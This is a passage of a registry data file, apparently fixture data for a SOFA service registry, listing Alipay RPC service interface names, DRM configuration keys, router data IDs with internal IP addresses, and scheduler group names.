AULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.charityasset.common.service.facade.api.AccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantRelationPageQueryFacade:1.0:mifcz-merchantRelationPageQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.securitysimulate.common.service.client.drm.SimulateFlowResource.integrationWhiteListAttribute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dchaincustomer.facade.api.user.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iopencore.common.service.manager.DefinitionSpaceDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.BetaStrategyMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.118.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finslip:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.158.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:definpfprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.170.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.mayibank.bkprocecore.oyz.facade.resource.DeployResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbshopdecorate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.workflow.common.service.facade.api.tsd.TsdAbilityFacade:1.0:opensupport_cloudparse_cloudparseability@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.170.253#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_LINKS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.cifin:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chair-script:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fin.pdcore.common.service.facade.adapter.AdapterProdInventoryServiceFacade:1.0:finpdcorewealth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.data.process.facade.sql.DataProcessSqlParseService:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudpay.openapi.dinner.DinnerOrderSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.ext.payment.service.refund.ack.OutSideCardRefundAckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.industry.IndusPoolBinRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctudb.CtuFactorRiskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.rateprocess.RateProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.ValidateParameterRepositoryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.capitalNotifySchedulerConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.210.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bizprodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.ding.DingFileServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lendpofprod.common.service.facade.loanapi.trans.LoanTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.sub01:1.0@XFIRE@testcloud#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmeteragecore.common.service.facade.MeterDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cfmng.biz.shared.manager.impl.EmergencyAdjustDrmResource.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:PAYACCEPTANCE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finfundtrade.common.service.facade.api.FundTradeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchstoreapp.common.service.facade.shoprelation.MerchantShopRelationDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.disableSchemeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bioperation.service.facade.api.TowerParamManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.shopservice.ShopServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.SDKTest:name=com.alipay.dwebupload.client.drm.DomainConfig.uploadTarget,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dsoc.service.facade.api.server.config.ServerConfigService:1.0:stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.yooki.moon.facade.AnimalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_antinvoice_scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acprodapicore.facade.service.SdkGeneratorServiceFacade:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilerelation.common.service.facade.AlipayRelationManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.processmng.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.baas.ClientProposalFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.ssrfPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpdcenter.facade.mng.GeneralExtObjMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-h5data@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.RopRiskTaskMemoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settleprod.common.service.facade.deposit.offline.DirectDepositFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:oe_activityProcessEndCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExSourceRateMonitorConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.MerchantContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.biz.activity.service.ActivityDeliveryRecQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.single.LifeSingleMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.biz.activity.service.DiscountActivityVccToolAdapterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.FileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zhub.bis.BioFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanprod.common.service.facade.service.lend.CreditCardAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.common.service.facade.api.AdvertDiscountBatchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.ZonemngFlowOpsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.appointment.AppointmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igtransferprod.common.service.facade.IgtpParticipantCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.voucherprod.facade.api.rule.VcpVoucherRuleFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.chat.api.ChatSessionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@finopenscene#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","NS_Pub_Servers_TP_C_MOBILECASHIER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecodec.service.facade.CodeParseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.MonitorConfigMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.50.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.ArrangementService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BBCCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mquery.common.service.facade.report.ShopReportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobileacauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityDoneeItemFeedbackGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.otp.common.service.facade.api.OtpSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.CommonCmdConfigDrm.monitorInterval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.facade.cicada.PublicCicadaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:aqe@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mitemcenter.common.service.facade.backend.api.BackendItemInventoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PlacardQueryFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.depositback.DbackSlipService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.drm.Drm4DispatchTask.idempotentValid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.RCacheServerTBaseCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone_dest.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recon.common.service.query.fund.api.QueryReonLogService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.64.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:turingTagApprove_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.174.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsnsprod.service.facade.api.SnsInteractFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.mif.common.service.facade.MerchantShopPageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.cryptprod.common.service.facade.CipherCertQueryFacade:1.0:@fccryptprod_service_unique_id@#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.246.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEscape,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fppolicygw.async.facade.facade.ScheduleReceiveFacade:1.0:agdswindspeed@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imif.opcenter.common.service.facade.crm.v2.api.CrmMerchantShopQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.CertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:yuyandeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.confmng.FlowCtrMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.loancore.common.service.facade.api.query.LcArgQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rdeclarecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_changeAcctNameProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.label.editor.isOpenRiskTestResultMapping,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dwsap.common.service.facade.columncardinality.ColumnCardinalityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.grab.GrabShopManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ngfeguard.facade.diagnose.DiagnoseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.PermissionCompensateManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.delivery.AdGroupApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.212.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.afsc.common.service.assistinvestigate.core.AssistRetryTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.securitycap.apayCrmDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:tradefront@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.PromoQueryCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exriskcenter.common.service.facade.api.query.ExPredictPeriodTradeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofa4-test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebill.common.service.facade.mng.AreaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_FLUXPRO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.feeclcn.common.service.facade.FeeConsultFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.CustomerInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauditcenter.facade.AuditTrackConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.developer.OpenDeveloperManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopConfig.closeArticleUpdateInfoPidStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.oyz.core.facade.api.model.ModelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.mybank.bkloanweb.facade.UserStateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.xqlc.service.XqlcRecommendInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcpromochannel.service.PcPromoChannelGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.mng.GroovyManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.event.common.service.facade.service.BizgroupService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxcalc.communicate.plugin.CommunicatePlugin:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.TmallPCardSnapshotMsgDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_MPA#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditbenefit.facade.api.order.BFOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksigncentre_saleSchemeApproveCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatasync.common.service.facade.reportengine.DataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.checkersdk.service.CheckerService:1.0:finreconchecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filefactory.service.facade.FilePlatformSlipService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.service.facade.api.AppletQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ordercore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.mtconfig.service.JourneyNodeConfigService:1.0:journeyNodeConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.SyncManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.zoloz.zmng.facade.facerecord.FaceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insureddrmhandler.redDotDrm,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.166.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.charityprod.commom.service.facade.OneKeyDonateActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.game.KnowledgeProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.idpatrol.core.service.bizCoverage.BcSystemService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.live.api.TaobaoLiveSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.MobileTransferRemindNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.activity.LifeActivityAwardOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue34#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.mif.common.service.facade.ParamQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.core.service.innerclient.master.drm.MasterConfigDRM.devSyncTestIp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zdataquery.common.service.facade.hbase.FinComposeExchangeDepositbackHbaseQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifprocess.task.remote.handler.RemoteTaskHandler:1.0:merchant-cache-remove@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotationcore.biz.service.prod.api.quotation.ProdQuotationManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commissioncenter.common.service.facade.api.ChannelMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.CodeTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kgengine@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.log.LogService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-trsautct-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.koubei.kbcateringorder.common.service.facade.api.order.CateringTokenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.CommodityOperationRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.protocol-https:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.chargefront:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bbcmng.common.service.facade.BbcTMCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custrelation.service.facade.family.FamilyRelationQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.SubscribeManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.multimediabase.facade.core.GroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.template.TemplateQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.kbgate.api.test.TrSayHello:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:etetestcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.AdminFundQuotationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_UNITRADEADAPTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:credittrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:loanbraintwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbdatafactory.common.service.facade.odps.OdpsConsumeTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zarcore:name=com.alipay.fc.arcore.migrate.localclient.config.enableLocalRoute,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundbankcore.common.service.facade.FundBankRedeemFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.InsMktFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.record.RecordDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.preparePayQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openevent@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.prototype.ActivityVoucherVerifyRangeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.api.InfoSecFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.EnergyBatchCollectService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.after.FundInvestmentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.integration.ebppgw.IsvOrderInvoiceServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_B_EXTERFACE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.securitydataservice:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloudprovision.facade.ResourcePoolMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwallet.wealth.drm.DRMResource.cdpPicCheckSpaceCo